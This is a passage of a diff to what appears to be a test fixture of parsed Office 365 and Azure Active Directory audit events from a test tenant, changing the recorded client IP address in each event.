APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -4423,9 +4423,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-09T15:34:47",
 "ExtendedProperties": [
 {
@@ -4659,7 +4659,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:52\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"5345f95e-44e0-48fc-823c-8206ff821338\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:52.5873254Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FQXLK\"},{\"Name\":\"env_seqNum\",\"Value\":\"42492828\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR565\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fe115c66-3e08-4ab4-8a00-84ae25a59078\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n 
\\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:52\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"5345f95e-44e0-48fc-823c-8206ff821338\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:52.5873254Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FQXLK\"},{\"Name\":\"env_seqNum\",\"Value\":\"42492828\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR565\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fe115c66-3e08-4ab4-8a00-84ae25a59078\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n 
\\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -4689,9 +4689,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-09T15:34:52",
 "ExtendedProperties": [
 {
@@ -4894,7 +4894,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:52\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"5345f95e-44e0-48fc-823c-8206ff821338\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
